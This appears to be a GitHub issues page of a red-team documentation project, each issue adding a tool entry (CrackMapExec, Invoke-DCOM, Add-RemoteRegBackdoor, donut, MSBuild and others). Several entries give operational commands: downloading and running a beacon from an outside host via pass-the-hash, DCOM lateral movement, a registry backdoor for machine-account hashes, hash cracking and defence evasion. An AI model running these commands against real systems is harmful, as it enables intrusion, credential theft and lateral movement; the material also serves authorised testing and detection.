
rtt-docs's People

Contributors

patrick-de


rtt-docs's Issues

New tool: crackmapexec

{
  "name": "crackmapexec",
  "phases": [
    "07. Lateral Movement",
    "08. Credentials & User Impersonation",
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://github.com/byt3bl33d3r/CrackMapExec",
  "description": "CrackMapExec (a.k.a. CME) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks. Built with stealth in mind, CME follows the concept of \"Living off the Land\": abusing built-in Active Directory features/protocols to achieve its functionality and allowing it to evade most endpoint protection/IDS/IPS solutions.",
  "undetected": [],
  "detected": [],
  "content": "# Crackmapexec\n\n## Deploy custom beacon\ncrackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"curl -o C:\\Windows\\Temp\\pivot.exe http://172.29.137.67:8081/pivot.exe\"\ncrackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"powershell.exe Invoke-Command -ScriptBlock {C:\\Windows\\Temp\\pivot.exe}\"\n\n## Test multiple credentials\nTurn a hashdump (user:rid:lm:nt:::) into one pass-the-hash check per account with a regex replace:\n'''sh\n#Pattern: (.*):(.*):(.*):(.*):::\n#Replacement: crackmapexec smb 172.29.139.180 -u $1 -H $4 -x whoami\ncrackmapexec smb 172.29.139.180 -u <USER> -H <NTLM> -x whoami\n'''\n\n## [[Guest Access (SMB)]]\nEnumerate null sessions\n>cme smb <ip> -u '' -p ''  \n\nEnumerate anonymous/guest access (a non-existent user with an empty password)\n>cme smb <ip> -u 'a' -p ''\n\n## [[SMB Signing]]\nChecking for SMB signing: the per-host line printed by 'cme smb <ip_range>' contains 'signing:True' or 'signing:False'; hosts without signing are candidates for NTLM relay.\n\n## [[User enum]]\n>cme smb <ip> -u <user> -p '<password>' --users\n\n## [[Shares]]\n* Enumerate smb hosts  \n>cme smb <ip_range>\n\n",
  "commands": [
    {
      "id": "cba65b8b-1f83-467a-8608-4e3965340652",
      "name": "Run command via SMB",
      "description": "For example deploying a beacon via SMB",
      "tag": "",
      "results": [
        "EXECUTION:REMOTE"
      ],
      "cmd": "crackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"curl -o C:\\Windows\\Temp\\pivot.exe http://172.29.137.67:8081/pivot.exe\"\ncrackmapexec smb 172.29.138.0/24 -u Administrator -H <hash> -x \"powershell.exe Invoke-Command -ScriptBlock {C:\\Windows\\Temp\\pivot.exe}\"",
      "requirements": {
        "and": [
          {
            "tag": "CRED:HASH"
          },
          {
            "tag": "SERVICE:SMB"
          },
          {
            "tag": "PRIVS:ADMIN"
          }
        ]
      }
    },
    {
      "id": "624a21de-3375-4b68-868a-a6408521ce6b",
      "name": "Enumerate null / anon sessions",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "cme smb <ip> -u '' -p ''\ncme smb <ip> -u 'a' -p ''"
    },
    {
      "id": "641aee06-bfb3-41db-b032-58eb372f4b5c",
      "name": "Remote user enumeration",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "cme smb <ip> -u <user> -p '<password>' --users"
    },
    {
      "id": "9572ef78-24b0-4515-9fda-cd273050ae01",
      "name": "Enumerate smb hosts",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "cme smb <ip_range>"
    }
  ],
  "references": [
    "https://wiki.porchetta.industries/"
  ]
}
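The "Test multiple credentials" step above turns a hashdump into one CrackMapExec pass-the-hash run per account with a sed-style regex. The Python below is an added example, not code from rtt-docs or CrackMapExec, that does the same over a constructed hashdump with stricter validation: it drops banner lines, skips accounts whose NT hash is the empty-password hash, optionally skips machine accounts, and reports accounts that share an NT hash (same password). The target IP, account names and hash values are made up.

```python
import re

# Constructed sample in the secretsdump/pwdump format the page's sed pattern
# targets: user:rid:lmhash:nthash::: (accounts and hashes are made up).
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:a3e7c1f4b8d2e6091c5b7d3f2a1e9c8b:::
WKSTN01$:1106:aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99:::
jdoe:1107:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
"""

# NT hash of the empty password; such accounts are useless for pass-the-hash.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Stricter than the page's (.*):(.*):(.*):(.*)::: pattern: the RID must be
# numeric and both hashes exactly 32 hex characters, so status lines are dropped.
HASH_LINE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_hashdump(text):
    """Yield (user, rid, lm, nt) for every well-formed hash line."""
    for line in text.splitlines():
        m = HASH_LINE.match(line.strip())
        if m:
            yield m.group(1), int(m.group(2)), m.group(3).lower(), m.group(4).lower()


def cme_commands(text, target, exec_cmd="whoami", skip_machine=True):
    """Build one crackmapexec pass-the-hash check per usable account."""
    cmds = []
    for user, _rid, _lm, nt in parse_hashdump(text):
        if nt == EMPTY_NT:
            continue  # blank password, a logon attempt only adds noise
        if skip_machine and user.endswith("$"):
            continue  # machine accounts rarely hold local admin elsewhere
        cmds.append(f"crackmapexec smb {target} -u '{user}' -H {nt} -x '{exec_cmd}'")
    return cmds


def shared_nt_hashes(text):
    """Accounts sharing an NT hash share a password: cracking or relaying one
    of them yields all of them, which is worth knowing before spraying."""
    by_hash = {}
    for user, _rid, _lm, nt in parse_hashdump(text):
        by_hash.setdefault(nt, []).append(user)
    return {nt: users for nt, users in by_hash.items() if len(users) > 1}


if __name__ == "__main__":
    print("\n".join(cme_commands(SAMPLE_DUMP, "172.29.139.180")))
    print(shared_nt_hashes(SAMPLE_DUMP))
```

Feed the generated lines to a shell (or a `parallel` run) the same way the sed replacement is used; CME accepts the bare NT hash after `-H`, so the LM half is not needed.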

New tool: Active Directory Service Interface

{
  "name": "Active Directory Service Interface",
  "phases": [
    "06. Domain Enumeration"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "https://learn.microsoft.com/de-de/windows/win32/adsi/active-directory-service-interfaces-adsi",
  "description": "Active Directory Service Interfaces (ADSI) is a set of COM interfaces used to access the features of directory services from different network providers.",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "d53c8ab4-60b8-4a7c-bd0a-5b9215366d4d",
      "name": "Get Domain Controller",
      "description": "",
      "tag": "",
      "results": [
        "INTEL:DOMAIN:DC"
      ],
      "cmd": "[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers",
      "requirements": {
        "tag": "S"
      }
    },
    {
      "id": "0513b338-00d6-40f6-9e27-e955c0faf923",
      "name": "Enumerate Remote Users",
      "description": "Lists the members of the local Administrators group on a remote computer via the WinNT ADSI provider",
      "tag": "",
      "results": [
        "INTEL:DOMAIN:USERS"
      ],
      "cmd": "([ADSI]'WinNT://<computer>/Administrators').psbase.Invoke('Members') | %{$_.GetType().InvokeMember('Name', 'GetProperty', $null, $_, $null)}",
      "requirements": {
        "and": [
          {
            "tag": "SERVICE:SMB"
          },
          {
            "tag": "COMPUTER:CONFIG:REMOTEMANAGEMENT"
          },
          {
            "or": [
              {
                "tag": "COMPUTER:IP"
              },
              {
                "tag": "COMPUTER:HOSTNAME"
              }
            ]
          }
        ]
      }
    }
  ],
  "content": "",
  "references": []
}

New tool: Invoke-DCOM

{
  "name": "Invoke-DCOM",
  "phases": [
    "01. Initial Access",
    "07. Lateral Movement"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Windows"
  ],
  "source": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1",
  "description": "Lateral Move via DCOM.",
  "undetected": [],
  "detected": [],
  "content": "# Invoke-DCOM\n\n## [[DCOM]]\n'''\nImport-Module .\\Invoke-DCOM.ps1\nInvoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\"\nInvoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\"\n'''\n\nTo interact over Distributed Component Object Model (DCOM), we must use an external tool such as [[Invoke-DCOM]].\n'''beacon\nbeacon> powershell-import C:\\Tools\\Invoke-DCOM.ps1\nbeacon> powershell Invoke-DCOM -ComputerName srv1 -Method MMC20.Application -Command C:\\Windows\\beacon-smb.exe\nCompleted\n\nbeacon> link srv1\n[+] established link to child beacon: 10.10.1.20\n'''\n\nDCOM is more complicated to detect, since each \"Method\" works in a different way and leaves a different process tree. In the particular case of 'MMC20.Application', the spawned process will be a child of 'mmc.exe', which was itself started out-of-process by the DCOM activator.\n\n'''\nProcessId: 952\nImage: C:\\Windows\\beacon-smb.exe\nParentImage: C:\\Windows\\System32\\mmc.exe\n'''\nProcesses started via DCOM may also be seen where the parent is 'svchost.exe' (started with the command line '-k DcomLaunch').\n\n",
  "commands": [
    {
      "id": "cfb6398e-d128-41e6-8e25-9f3effdcf564",
      "name": "Import",
      "description": "Import module",
      "tag": "",
      "results": [],
      "cmd": "Import-Module .\\Invoke-DCOM.ps1"
    },
    {
      "id": "ffd4d5ff-e7cf-4621-b07d-f69d9687b635",
      "name": "Execute command via MMC20.Application",
      "description": "DCOM activation (svchost.exe -k DcomLaunch) starts mmc.exe out-of-process; the command then runs as a child of mmc.exe via the ExecuteShellCommand method",
      "tag": "",
      "results": [],
      "cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method MMC20.Application -Command \"calc.exe\""
    },
    {
      "id": "ded4b315-b2e7-435b-bb11-d21234a1b32c",
      "name": "Execute command via ExcelDDE",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ExcelDDE -Command \"calc.exe\""
    },
    {
      "id": "16dee6f1-13c1-4e1c-a5e1-52a17830506b",
      "name": "Execute command via ServiceStart ",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "Invoke-DCOM -ComputerName '192.168.2.100' -Method ServiceStart \"MyService\""
    }
  ]
}
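The process-tree observations above (the beacon as a child of mmc.exe, DCOM-started processes under svchost.exe -k DcomLaunch) can be turned into detection logic. The following Python is an added example, not code from rtt-docs or Invoke-DCOM: it walks a constructed batch of Sysmon-style process-creation events and grades each spawn. The check for the -Embedding switch relies on standard COM behaviour for out-of-process activation; the allowlist of images normally seen under DcomLaunch is an assumption to tune per environment, and all PIDs and paths are made up.

```python
import ntpath

# Constructed process-creation events in Sysmon Event ID 1 terms (pid, ppid,
# image, command line). The tree is made up to exercise the rules and includes
# the beacon-smb.exe spawn under mmc.exe shown on the page.
SAMPLE_EVENTS = [
    {"pid": 800,  "ppid": 4,    "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k DcomLaunch -p"},
    {"pid": 1500, "ppid": 900,  "image": r"C:\Windows\explorer.exe",
     "cmdline": r"C:\Windows\explorer.exe"},
    {"pid": 1200, "ppid": 800,  "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r'"C:\Windows\System32\mmc.exe" -Embedding'},
    {"pid": 952,  "ppid": 1200, "image": r"C:\Windows\beacon-smb.exe",
     "cmdline": r"C:\Windows\beacon-smb.exe"},
    {"pid": 3100, "ppid": 800,  "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Public\x.dll,Start"},
    {"pid": 2200, "ppid": 1500, "image": r"C:\Windows\System32\mmc.exe",
     "cmdline": r"C:\Windows\System32\mmc.exe services.msc"},
    {"pid": 2300, "ppid": 2200, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe"},
    {"pid": 3200, "ppid": 800,  "image": r"C:\Windows\System32\dllhost.exe",
     "cmdline": r"C:\Windows\System32\dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"},
]

# Images routinely activated by the DcomLaunch svchost in normal operation.
# Assumption for this example, to be tuned per environment; not an official list.
EXPECTED_DCOM_CHILDREN = {"dllhost.exe", "wmiprvse.exe"}


def _image_name(path):
    return ntpath.basename(path).lower()


def is_dcomlaunch_host(event):
    """True for the svchost.exe instance hosting the DCOM Server Process Launcher."""
    return (event is not None
            and _image_name(event["image"]) == "svchost.exe"
            and "dcomlaunch" in event["cmdline"].lower())


def flag_dcom_spawns(events):
    """Return (pid, severity, reason) for process starts matching the DCOM
    lateral-movement trees described on the page."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        parent = by_pid.get(ev["ppid"])
        if parent is None:
            continue  # parent not in this batch (e.g. System); nothing to correlate
        parent_img = _image_name(parent["image"])
        img = _image_name(ev["image"])
        if parent_img == "mmc.exe":
            grandparent = by_pid.get(parent["ppid"])
            # COM passes -Embedding to an out-of-process server it activates, so an
            # mmc.exe carrying that switch (or sitting under DcomLaunch) was not
            # opened by a user at the console.
            if "-embedding" in parent["cmdline"].lower() or is_dcomlaunch_host(grandparent):
                findings.append((ev["pid"], "high",
                                 "child of DCOM-activated mmc.exe (MMC20.Application)"))
            else:
                findings.append((ev["pid"], "low", "child of an interactive mmc.exe"))
        elif is_dcomlaunch_host(parent):
            if img == "mmc.exe":
                findings.append((ev["pid"], "medium", "mmc.exe activated by DcomLaunch"))
            elif img not in EXPECTED_DCOM_CHILDREN:
                findings.append((ev["pid"], "medium",
                                 f"unexpected {img} spawned by DcomLaunch svchost"))
    return findings


if __name__ == "__main__":
    for pid, sev, why in flag_dcom_spawns(SAMPLE_EVENTS):
        print(f"{sev:6} pid={pid}: {why}")
```

The grading deliberately separates the two signals the page gives: a process under an mmc.exe that was started out-of-process is the strongest indicator, a direct child of the DcomLaunch svchost is weaker on its own because legitimate COM surrogates live there too.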

New tool: C2concealer

{
  "name": "C2concealer",
  "phases": [
    "00. Infrastructure"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Linux"
  ],
  "source": "https://github.com/FortyNorthSecurity/C2concealer",
  "description": "C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.",
  "undetected": [],
  "detected": [],
  "content": "\n\n## [[Cobalt Strike]]\n\n",
  "commands": [
    {
      "id": "8e0dc6a7-a1fc-4a1e-ac0f-0dfe239cd961",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "chmod u+x install.sh\n./install.sh"
    },
    {
      "id": "faac6737-b5fa-419c-b71a-2be384f8743f",
      "name": "Generate malleable profile",
      "description": "Generate malleable profile with 3 HTTP client/server variants",
      "tag": "",
      "results": [],
      "cmd": "C2concealer --hostname google.com --variant 3"
    }
  ]
}

New tool: LinkSniper

{
  "name": "LinkSniper",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "OSINT",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://github.com/0x802/LinkSniper",
  "description": "Crawls the target and collects every link it finds; links that belong to the target (for example its subdomains) are crawled in turn, links to other domains are not added to the output, and the process continues until the link map is complete.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Exposed Machines]]\n\n",
  "commands": [
    {
      "id": "79bfc7a5-811d-4d7c-a097-b5ec220bd1a0",
      "name": "Spider a website to find all its links",
      "description": "",
      "tag": "",
      "results": [
        "INTEL:WEB:LINKS"
      ],
      "cmd": "python3 LinkSniper.py https://www.google.com\n"
    }
  ]
}

New tool: Add-RemoteRegBackdoor

{
  "name": "Add-RemoteRegBackdoor",
  "phases": [
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Windows"
  ],
  "source": "https://github.com/HarmJ0y/DAMP/blob/master/Add-RemoteRegBackdoor.ps1",
  "description": "Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Remote Registry]]\n'Add-RemoteRegBackdoor' can be run locally on a compromised machine, or remotely with credentials. It loosens the DACLs of the registry keys that hold the boot key and LSA secrets so that the chosen trustee can read them later through the Remote Registry service without being an administrator.\n'''beacon\nbeacon> run hostname\nsrv2\n\nbeacon> getuid\n[*] You are NT AUTHORITY\\SYSTEM (admin)\n\nbeacon> powershell Add-RemoteRegBackdoor -Trustee EDU\\john\nComputerName BackdoorTrustee\n------------ ---------------\nSRV2 EDU\\john\n'''\n\nAs EDU\\john (error 5 on the admin share shows he has no admin rights on srv2) the machine account hash can still be pulled:\n'''beacon\nbeacon> getuid\n[*] You are EDU\\john\n\nbeacon> ls \\\\srv2\\c$\n[-] could not open \\\\srv2\\c$\\*: 5\n\nbeacon> powershell Get-RemoteMachineAccountHash -ComputerName srv2\n\nComputerName MachineAccountHash \n------------ ------------------ \nsrv2 5d0d485386727a8a92498a2c188627ec\n'''\n\n\n",
  "commands": [
    {
      "id": "707832f8-a129-4e7c-a159-ef62d11bb1e5",
      "name": "Add-RemoteRegBackdoor",
      "description": "Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash.",
      "cmd": "powershell Add-RemoteRegBackdoor -Trustee EDU\\john",
      "tag": "GatherAccountHashBackdoor",
      "requirements": [
        {
          "name": "Admin",
          "category": "Credentials",
          "exists": true
        }
      ],
      "results": [
        {
          "name": "MachineAccountHash",
          "category": "Credentials",
          "exists": true
        }
      ]
    },
    {
      "id": "3ad621d5-334d-47e2-9106-0d63b909090e",
      "name": "Add-RemoteRegBackdoor#2",
      "description": "Implements a new remote registry backdoor that allows for the remote retrieval of a system's machine account hash.",
      "cmd": "powershell Add-RemoteRegBackdoor -Trustee EDU\\john",
      "tag": "GatherAccountHashBackdoor",
      "requirements": [
        {
          "name": "Admin",
          "category": "Credentials",
          "exists": true
        }
      ],
      "results": [
        {
          "name": "MachineAccountHash",
          "category": "Credentials",
          "exists": true
        }
      ]
    }
  ],
  "path": "tools/Add-RemoteRegBackdoor.md"
}

New tool: Amass

{
  "name": "Amass",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Cross platforms (GO)"
  ],
  "source": "https://github.com/owasp-amass/amass",
  "description": "The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Exposed Machines]]\nScan for external machines\n\n",
  "commands": [
    {
      "id": "3d58a22c-e1ee-41b2-9c68-5a64efba043b",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "# Download the release archive for your platform from https://github.com/owasp-amass/amass/releases/latest\n# or build from source:\ngo install -v github.com/owasp-amass/amass/v4/...@master"
    }
  ]
}

New tool: John the Ripper

{
  "name": "John the Ripper",
  "phases": [
    "02. Reconnaissance",
    "08. Credentials & User Impersonation"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://www.openwall.com/john/",
  "description": "John the Ripper is an Open Source password security auditing and password recovery tool available for many operating systems.",
  "undetected": [],
  "detected": [],
  "content": "# John the Ripper\n\n\n## [[Crack Credentials]]\nCracking NetNTLMv2 hashes (e.g. captured with Responder or from a relay attempt)\n'''sh\njohn --format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2\n'''\n\n\n",
  "commands": [
    {
      "id": "ff58951f-1f3f-4ba1-b0de-a11fe3a78740",
      "name": "Cracking netntlmv2",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "john --format=netntlmv2 --wordlist=wordlist svc_mssql-netntlmv2"
    }
  ]
}

New tool: donut

{
  "name": "donut",
  "phases": [
    "10. Bypassing Defenses"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Windows",
    "Linux"
  ],
  "source": "https://github.com/TheWover/donut",
  "description": "Generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET Assemblies, PE files, and other Windows payloads from memory and runs them with parameters",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "ab7ad162-8447-47b9-94ea-2f4d7273afef",
      "name": "Create shellcode of .NET assembly",
      "description": "Create shellcode of .NET assembly",
      "tag": "",
      "results": [],
      "cmd": "donut.exe -i MyAssembly.exe -c MyAssembly.Program"
    }
  ],
  "content": ""
}

New tool: Chameleon

{
  "name": "Chameleon",
  "phases": [
    "00. Infrastructure",
    "06. Domain Enumeration"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Python"
  ],
  "source": "https://github.com/mdsecactivebreach/Chameleon",
  "description": "A tool for domain categorisation",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Categorize Domain]]\n\n⚠️ When attempting to categorise a site in Bluecoat, do not check the category first otherwise it will end up uncategorised! Individual hosts can however be categorised differently.\n\n'''\nusage: chameleon.py [-h] [--proxy <proxy>] [--check] [--submit]\n                    [--domain <domain>]\n\noptional arguments:\n  -h, --help         show this help message and exit\n  --proxy <proxy>    Proxy type: a = all, b = bluecoat, m = mcafee, i = IBM\n                     Xforce\n  --check            Perform check on current category\n  --submit           Submit new category\n  --domain <domain>  Domain to validate\n'''\n\n\n",
  "commands": [
    {
      "id": "3a3033f5-5477-4e80-b39c-242e4c529e4b",
      "name": "Check categorization",
      "description": "Check categorization for Bluecoat, McAfee Trustedsource and IBM X-Force",
      "tag": "",
      "results": [],
      "cmd": "python chameleon.py --proxy a --check --domain google.com"
    },
    {
      "id": "db1ceb93-65c0-4b1e-80d3-c0ae724e4914",
      "name": "Submit categorization",
      "description": "Submit categorization to Bluecoat, McAfee Trustedsource and IBM X-Force",
      "tag": "",
      "results": [],
      "cmd": "python chameleon.py --proxy a --submit --domain google.com"
    }
  ]
}

New tool: ADExplorerSnapshot

{
  "name": "ADExplorerSnapshot",
  "phases": [
    "06. Domain Enumeration"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Python"
  ],
  "source": "https://github.com/c3c/ADExplorerSnapshot.py",
  "description": "ADExplorerSnapshot.py is an AD Explorer snapshot parser. It is made as an ingestor for BloodHound, and also supports full-object dumping to NDJSON.",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "e3e497fc-1857-460a-a33d-3969a0a8de07",
      "name": "Snapshot to bloodhound",
      "description": "Transform snapshot to bloodhound zip",
      "tag": "",
      "results": [
        "INTEL:DOMAIN:COMPUTERS",
        "INTEL:DOMAIN:DOMAINS",
        "INTEL:DOMAIN:GPOS",
        "INTEL:DOMAIN:GROUPS",
        "INTEL:DOMAIN:SID",
        "INTEL:DOMAIN:TRUSTS",
        "INTEL:DOMAIN:USERS"
      ],
      "cmd": "python ADExplorerSnapshot.py -o bhzip /mnt/c/Users/patri/Downloads/projects/bloodhound-import/install_temp.log",
      "requirements": {
        "tag": "ADExplorer:Snapshot"
      }
    }
  ],
  "content": ""
}

New tool: EyeWitness

{
  "name": "EyeWitness",
  "phases": [
    "02. Reconnaissance",
    "06. Domain Enumeration"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Python",
    "Windows"
  ],
  "source": "https://github.com/FortyNorthSecurity/EyeWitness",
  "description": "EyeWitness is designed to take screenshots of websites provide some server header info, and identify default credentials if known.",
  "undetected": [],
  "detected": [],
  "content": "This tool identifies (and takes screenshots of) web apps from a list of targets.\n\n## [[Find Web Server]]\nLocal Scan (does not work)\n>./EyeWitness.py --localscan 192.168.1.0/24\n\nScan a list of IPs (for example the hosts Nmap found with a web port open) through a SOCKS proxy:\n'''sh\ncat /root/targets.txt\n10.10.17.71\n10.10.1.20\n10.10.17.68\n\nproxychains4 ./EyeWitness.py --web -f /root/targets.txt -d /root/edu --no-dns --no-prompt\n\nStarting Web Requests (3 Hosts)\nAttempting to screenshot http://10.10.17.71\n[*] WebDriverError when connecting to http://10.10.17.71\nAttempting to screenshot http://10.10.1.20\n[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.10.1.20:80  ...  OK\nAttempting to screenshot http://10.10.17.68\n[*] WebDriverError when connecting to http://10.10.17.68\nFinished in 12.967030048370361 seconds\n'''\n\n",
  "commands": [
    {
      "id": "f859e696-2096-4bbe-8a8f-1164b0d99f7a",
      "name": "Scan IP's from file",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "proxychains4 ./EyeWitness.py --web -f /root/targets.txt -d /root/edu --no-dns --no-prompt\n"
    }
  ]
}

New tool: dig

{
  "name": "dig",
  "phases": [
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://linux.die.net/man/1/dig",
  "description": "DNS lookup utility\n\ndig @nameserver name recordtype\n\ne.g.\n\ndig @1.1.1.1 myevildoma.in A\n\nVia SOCKS proxy:\nDNS normally goes over UDP, which SOCKS proxies such as proxychains do not forward. Use +tcp (or its older synonym +vc) so the query is sent over TCP and can be proxied.\n",
  "undetected": [],
  "detected": [],
  "content": "",
  "commands": [
    {
      "id": "7c296daf-1dda-4811-bdfe-0f74b2d7ee29",
      "name": "Query A record",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dig @nameserver name recordtype\ndig @1.1.1.1 apple.com A"
    },
    {
      "id": "c16ec93a-68d6-4de4-9e40-ea23377b9d2d",
      "name": "Get Domain Controller (Global Catalog) ",
      "description": "Look up the global catalog SRV record (_gc._tcp) and the DC locator SRV record (_ldap._tcp.dc._msdcs) to determine domain controller addresses",
      "tag": "",
      "results": [],
      "cmd": "dig -t SRV _gc._tcp.<domain>\ndig -t SRV _ldap._tcp.dc._msdcs.<domain>",
      "requirements": {
        "tag": "INTEL:DOMAIN:DOMAINS"
      }
    },
    {
      "id": "d4866eaf-525f-47b1-9412-c9037706bada",
      "name": "Server NS query",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dig -t NS <domain>"
    }
  ]
}

New tool: SauronEye

{
  "name": "SauronEye",
  "phases": [
    "03. Host Enumeration",
    "06. Domain Enumeration",
    "02. Reconnaissance"
  ],
  "category": "",
  "stealthy": false,
  "oss": [
    "Windows"
  ],
  "source": "https://github.com/vivami/SauronEye",
  "description": "Search tool to find specific files containing specific words, e.g. files containing passwords.",
  "undetected": [
    "Windows Defender (AV)",
    "MDE"
  ],
  "detected": [],
  "commands": [
    {
      "id": "79bf0a10-5f2b-4194-b826-f79599092a9c",
      "name": "Find passwords in files",
      "description": "Search file contents (--contents) for the keywords",
      "tag": "",
      "results": [],
      "cmd": "SauronEye.exe -d C:\\ --filetypes .txt .ps1 .vba .conf .ini --contents --keywords password pass* -v"
    },
    {
      "id": "157a585d-9c1e-46ac-a530-e5dc70f4e7ab",
      "name": "Find filenames containing keywords",
      "description": "Search file names only (no --contents) for the keywords",
      "tag": "",
      "results": [],
      "cmd": "SauronEye.exe -d C:\\ --filetypes .txt .ps1 .vba .conf .ini --keywords password pass* -v"
    }
  ],
  "content": ""
}

New tool: MSBuild

{
  "name": "MSBuild",
  "phases": [
    "03. Host Enumeration",
    "04. Persistence"
  ],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Windows"
  ],
  "source": "lolbas",
  "description": "MSBuild.exe is preinstalled on various versions of the Windows operating system and can be found in \"%WINDIR%\\Microsoft.NET\\Framework\\<NET-Version>\\MSBuild.exe\" (and Framework64 on x64 operating systems). It can be abused to execute arbitrary C# code through an inline task in a project file, so the code runs inside a signed Microsoft binary.",
  "undetected": [],
  "detected": [],
  "commands": [
    {
      "id": "2e0f58d8-11cb-43db-a8ba-e797def0a915",
      "name": "Execute arbitrary build script",
      "description": "Executes an arbitrary build script",
      "tag": "",
      "results": [],
      "cmd": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe \"C:\\Users\\ev1l\\Desktop\\my-project.xml\""
    }
  ],
  "content": ""
}

New tool: dig

{
  "name": "dig",
  "phases": [
    "02. Reconnaissance"
  ],
  "requirements": [],
  "results": [],
  "category": "",
  "stealthy": false,
  "platforms": [
    "Linux"
  ],
  "source": "https://linux.die.net/man/1/dig",
  "description": "DNS lookup utility\n\ndig @nameserver name recordtype\n\ne.g.\n\ndig @1.1.1.1 myevildoma.in A\n\nVia SOCKS proxy:\nDNS normally goes over UDP, which SOCKS proxies such as proxychains do not forward. Use +tcp (or its older synonym +vc) so the query is sent over TCP and can be proxied.\n",
  "undetected": [],
  "detected": [],
  "content": "",
  "commands": [
    {
      "id": "7c296daf-1dda-4811-bdfe-0f74b2d7ee29",
      "name": "Query A record",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "dig @nameserver name recordtype\ndig @1.1.1.1 apple.com A"
    }
  ]
}

New tool: spoofcheck

{
  "name": "spoofcheck",
  "phases": [
    "01. Initial Access",
    "08. Credentials & User Impersonation"
  ],
  "category": "OSINT",
  "stealthy": false,
  "platforms": [
    "Python"
  ],
  "source": "https://github.com/BishopFox/spoofcheck",
  "description": "Simple script that checks a domain for email protections",
  "undetected": [],
  "detected": [],
  "content": "\n## [[Internal Phishing]][[Phishing]]\nSimple script that checks a domain for email protections.\n\n",
  "commands": [
    {
      "id": "b0c14789-9e82-4c39-9975-da3eafe934ca",
      "name": "Check SPF and DMARC records",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "./spoofcheck.py [DOMAIN]"
    },
    {
      "id": "5e49afdc-8e7d-4ffe-b112-584176053a63",
      "name": "Install",
      "description": "",
      "tag": "",
      "results": [],
      "cmd": "git clone https://github.com/BishopFox/spoofcheck.git\npip install -r requirements.txt"
    }
  ]
}
